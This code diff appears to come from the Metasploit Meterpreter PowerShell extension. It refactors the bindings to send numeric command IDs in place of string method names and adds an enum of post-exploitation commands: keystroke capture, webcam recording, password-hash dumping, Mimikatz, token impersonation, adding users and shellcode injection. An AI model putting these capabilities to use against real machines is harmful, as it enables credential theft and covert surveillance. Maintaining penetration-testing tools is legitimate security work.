+        StdapiSysPowerExitwindows = 1066,
+        StdapiSysProcessAttach = 1067,
+        StdapiSysProcessClose = 1068,
+        StdapiSysProcessExecute = 1069,
+        StdapiSysProcessGetInfo = 1070,
+        StdapiSysProcessGetProcesses = 1071,
+        StdapiSysProcessGetpid = 1072,
+        StdapiSysProcessImageGetImages = 1073,
+        StdapiSysProcessImageGetProcAddress = 1074,
+        StdapiSysProcessImageLoad = 1075,
+        StdapiSysProcessImageUnload = 1076,
+        StdapiSysProcessKill = 1077,
+        StdapiSysProcessMemoryAllocate = 1078,
+        StdapiSysProcessMemoryFree = 1079,
+        StdapiSysProcessMemoryLock = 1080,
+        StdapiSysProcessMemoryProtect = 1081,
+        StdapiSysProcessMemoryQuery = 1082,
+        StdapiSysProcessMemoryRead = 1083,
+        StdapiSysProcessMemoryUnlock = 1084,
+        StdapiSysProcessMemoryWrite = 1085,
+        StdapiSysProcessThreadClose = 1086,
+        StdapiSysProcessThreadCreate = 1087,
+        StdapiSysProcessThreadGetThreads = 1088,
+        StdapiSysProcessThreadOpen = 1089,
+        StdapiSysProcessThreadQueryRegs = 1090,
+        StdapiSysProcessThreadResume = 1091,
+        StdapiSysProcessThreadSetRegs = 1092,
+        StdapiSysProcessThreadSuspend = 1093,
+        StdapiSysProcessThreadTerminate = 1094,
+        StdapiSysProcessWait = 1095,
+        StdapiUiDesktopEnum = 1096,
+        StdapiUiDesktopGet = 1097,
+        StdapiUiDesktopScreenshot = 1098,
+        StdapiUiDesktopSet = 1099,
+        StdapiUiEnableKeyboard = 1100,
+        StdapiUiEnableMouse = 1101,
+        StdapiUiGetIdleTime = 1102,
+        StdapiUiGetKeysUtf8 = 1103,
+        StdapiUiSendKeyevent = 1104,
+        StdapiUiSendKeys = 1105,
+        StdapiUiSendMouse = 1106,
+        StdapiUiStartKeyscan = 1107,
+        StdapiUiStopKeyscan = 1108,
+        StdapiUiUnlockDesktop = 1109,
+        StdapiWebcamAudioRecord = 1110,
+        StdapiWebcamGetFrame = 1111,
+        StdapiWebcamList = 1112,
+        StdapiWebcamStart = 1113,
+        StdapiWebcamStop = 1114,
+        PrivElevateGetsystem = 2001,
+        PrivFsBlankDirectoryMace = 2002,
+        PrivFsBlankFileMace = 2003,
+        PrivFsGetFileMace = 2004,
+        PrivFsSetFileMace = 2005,
+        PrivFsSetFileMaceFromFile = 2006,
+        PrivPasswdGetSamHashes = 2007,
+        ExtapiAdsiDomainQuery = 3001,
+        ExtapiClipboardGetData = 3002,
+        ExtapiClipboardMonitorDump = 3003,
+        ExtapiClipboardMonitorPause = 3004,
+        ExtapiClipboardMonitorPurge = 3005,
+        ExtapiClipboardMonitorResume = 3006,
+        ExtapiClipboardMonitorStart = 3007,
+        ExtapiClipboardMonitorStop = 3008,
+        ExtapiClipboardSetData = 3009,
+        ExtapiNtdsParse = 3010,
+        ExtapiPageantSendQuery = 3011,
+        ExtapiServiceControl = 3012,
+        ExtapiServiceEnum = 3013,
+        ExtapiServiceQuery = 3014,
+        ExtapiWindowEnum = 3015,
+        ExtapiWmiQuery = 3016,
+        SnifferCaptureDump = 4001,
+        SnifferCaptureDumpRead = 4002,
+        SnifferCaptureRelease = 4003,
+        SnifferCaptureStart = 4004,
+        SnifferCaptureStats = 4005,
+        SnifferCaptureStop = 4006,
+        SnifferInterfaces = 4007,
+        WinpmemDumpRam = 7001,
+        KiwiExecCmd = 8001,
+        UnhookPe = 10001,
+        EspiaImageGetDevScreen = 11001,
+        IncognitoAddGroupUser = 12001,
+        IncognitoAddLocalgroupUser = 12002,
+        IncognitoAddUser = 12003,
+        IncognitoImpersonateToken = 12004,
+        IncognitoListTokens = 12005,
+        IncognitoSnarfHashes = 12006,
+        PythonExecute = 13001,
+        PythonReset = 13002,
+        PowershellAssemblyLoad = 14001,
+        PowershellExecute = 14002,
+        PowershellSessionRemove = 14003,
+        PowershellShell = 14004,
+        LanattacksAddTftpFile = 15001,
+        LanattacksDhcpLog = 15002,
+        LanattacksResetDhcp = 15003,
+        LanattacksResetTftp = 15004,
+        LanattacksSetDhcpOption = 15005,
+        LanattacksStartDhcp = 15006,
+        LanattacksStartTftp = 15007,
+        LanattacksStopDhcp = 15008,
+        LanattacksStopTftp = 15009,
+        PeinjectorInjectShellcode = 16001,
+        MimikatzCustomCommand = 17001,
+    }
+}

powershell/MSF.Powershell/Meterpreter/Elevate.cs

@@ -14,7 +14,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.ElevateTechnique, 1);
             tlv.Pack(TlvType.ElevateServiceName, "abcd1234");
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("priv_elevate_getsystem"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.PrivElevateGetsystem));
 
             if (result != null)
             {
@@ -32,7 +32,7 @@ namespace MSF.Powershell.Meterpreter
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_rev2self"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigRev2self));
 
             if (result != null)
             {
@@ -51,7 +51,7 @@ namespace MSF.Powershell.Meterpreter
             Tlv tlv = new Tlv();
             tlv.Pack(TlvType.Pid, pid);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_steal_token"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigStealToken));
 
             if (result != null)
             {
@@ -69,7 +69,7 @@ namespace MSF.Powershell.Meterpreter
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_drop_token"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigDropToken));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Enumerations.cs

@@ -39,7 +39,7 @@ namespace MSF.Powershell.Meterpreter
     {
         // Actual types
         Any = MetaType.None,
-        Method = MetaType.String | 1,
+        CommandId = MetaType.Uint | 1,
         RequestId = MetaType.String | 2,
         Exception = MetaType.Group | 3,
         Result = MetaType.Uint | 4,

powershell/MSF.Powershell/Meterpreter/FileSystem.cs

@@ -30,7 +30,7 @@ namespace MSF.Powershell.Meterpreter
         {
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_fs_mount_show"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiFsMountShow));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Incognito.cs

@@ -48,7 +48,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.IncognitoUserName, username);
             tlv.Pack(TlvType.IncognitoPassword, password);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_add_user"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoAddUser));
 
             if (result != null)
             {
@@ -69,15 +69,15 @@ namespace MSF.Powershell.Meterpreter
 
         public static bool AddGroupUser(string server, string group, string username)
         {
-            return AddGroupUserInternal("incognito_add_group_user", server, group, username);
+            return AddGroupUserInternal(CommandId.IncognitoAddGroupUser, server, group, username);
         }
         
         public static bool AddLocalGroupUser(string server, string group, string username)
         {
-            return AddGroupUserInternal("incognito_add_localgroup_user", server, group, username);
+            return AddGroupUserInternal(CommandId.IncognitoAddLocalgroupUser, server, group, username);
         }
         
-        private static bool AddGroupUserInternal(string msg, string server, string group, string username)
+        private static bool AddGroupUserInternal(CommandId commandId, string server, string group, string username)
         {
             System.Diagnostics.Debug.Write("[PSH BINDING] Invoking binding call AddGroupUserInternal");
 
@@ -86,7 +86,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.IncognitoGroupName, group);
             tlv.Pack(TlvType.IncognitoUserName, username);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(msg));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(commandId));
 
             if (result != null)
             {
@@ -111,7 +111,7 @@ namespace MSF.Powershell.Meterpreter
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_snarf_hashes"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoSnarfHashes));
 
             if (result != null)
             {
@@ -137,7 +137,7 @@ namespace MSF.Powershell.Meterpreter
             Tlv tlv = new Tlv();
             tlv.Pack(TlvType.IncognitoImpersonateToken, user);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_impersonate_token"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoImpersonateToken));
 
             if (result != null)
             {
@@ -173,7 +173,7 @@ namespace MSF.Powershell.Meterpreter
             Tlv tlv = new Tlv();
             tlv.Pack(TlvType.IncognitoListTokensTokenOrder, (int)type);
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("incognito_list_tokens"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.IncognitoListTokens));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Kiwi.cs

@@ -158,7 +158,7 @@ namespace MSF.Powershell.Meterpreter
             tlv.Pack(TlvType.KiwiCmd, command);
 
             System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoking kiwi_exec_cmd");
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("kiwi_exec_cmd"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.KiwiExecCmd));
             System.Diagnostics.Debug.Write("[PSH BINDING - DCSYNC] Invoked kiwi_exec_cmd");
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Sys.cs

@@ -29,7 +29,7 @@ namespace MSF.Powershell.Meterpreter
         {
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_sysinfo"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigSysinfo));
 
             if (result != null)
             {
@@ -64,7 +64,7 @@ namespace MSF.Powershell.Meterpreter
         {
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_process_get_processes"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysProcessGetProcesses));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/Tlv.cs

@@ -10,7 +10,7 @@ namespace MSF.Powershell.Meterpreter
     {
         private MemoryStream _stream = null;
 
-        public byte[] ToRequest(string methodName)
+        public byte[] ToRequest(CommandId commandId)
         {
             var tlvBytes = this.Bytes;
             if (tlvBytes == null)
@@ -24,8 +24,9 @@ namespace MSF.Powershell.Meterpreter
                 var packetType = ToBytes((int)PacketType.Request);
 
                 headerStream.Write(packetType, 0, packetType.Length);
-                Append(headerStream, TlvType.Method, ToBytes(methodName));
+                Append(headerStream, TlvType.CommandId, commandId);
-                Append(headerStream, TlvType.RequestId, ToBytes(Core.RandomString(8)));
+                var requestId = Core.RandomString(8);
+                Append(headerStream, TlvType.RequestId, ToBytes(requestId));
 
                 header = headerStream.ToArray();
             }
@@ -219,6 +220,17 @@ namespace MSF.Powershell.Meterpreter
             Append(_stream, t, value);
         }
 
+        private static void Append(MemoryStream stream, TlvType t, CommandId commandId)
+        {
+            System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] Adding type {0} ({1}) of {2} ({3})", t, (uint)t, commandId, (uint)commandId));
+            var type = ToBytes((int)t);
+            var value = ToBytes((uint)commandId);
+            var length = ToBytes(value.Length + type.Length + 4);
+            stream.Write(length, 0, length.Length);
+            stream.Write(type, 0, type.Length);
+            stream.Write(value, 0, value.Length);
+        }
+
         private static void Append(MemoryStream stream, TlvType t, byte[] value)
         {
             System.Diagnostics.Debug.Write(string.Format("[PSH BINDING] Adding type {0} of {1} bytes", t, value.Length));
@@ -280,7 +292,7 @@ namespace MSF.Powershell.Meterpreter
 
         private static byte[] ToBytes(uint i)
         {
-            return BitConverter.GetBytes(IPAddress.HostToNetworkOrder(i));
+            return BitConverter.GetBytes(IPAddress.HostToNetworkOrder((int)i));
         }
 
         private static byte[] ToBytes(string s)

powershell/MSF.Powershell/Meterpreter/Transport.cs

@@ -34,7 +34,7 @@ namespace MSF.Powershell.Meterpreter
         {
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("core_transport_list"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.CoreTransportList));
 
             if (result != null)
             {
@@ -195,7 +195,7 @@ namespace MSF.Powershell.Meterpreter
                 tlv.Pack(TlvType.TransCertHash, hash);
             }
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("core_transport_add"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.CoreTransportAdd));
 
             if (result != null)
             {

powershell/MSF.Powershell/Meterpreter/User.cs

@@ -10,7 +10,7 @@
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_getuid"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigGetuid));
 
             if (result != null)
             {
@@ -31,7 +31,7 @@
 
             Tlv tlv = new Tlv();
 
-            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest("stdapi_sys_config_getsid"));
+            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.StdapiSysConfigGetsid));
 
             if (result != null)
             {

powershell/MSF.Powershell/Runner.cs

@@ -161,6 +161,7 @@ namespace MSF.Powershell
             {
                 var output = _ui.ToString();
                 _ui.Clear();
+                System.Diagnostics.Debug.Write(string.Format("Output: {0}", output));
                 return output;
             }
 

powershell/build/generate.ps1

@@ -58,7 +58,7 @@ function Generate-MetasploitPowershell {
     $HeaderContent = New-Object System.Collections.ArrayList
     [void] $HeaderContent.Add("/*!`n")
     [void] $HeaderContent.Add(" * @file powershell_runner.h`n")
-    [void] $HeaderContent.Add(" * @brief This file is generated, do not modify directly.`n")
+    [void] $HeaderContent.Add(" * @brief This file was generated at $([DateTime]::UtcNow) UTC, do not modify directly.`n")
     [void] $HeaderContent.Add(" */`n`n")
     [void] $HeaderContent.Add("#ifndef _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H`n")
     [void] $HeaderContent.Add("#define _METERPRETER_SOURCE_EXTENSION_POWERSHELL_RUNNER_H`n`n")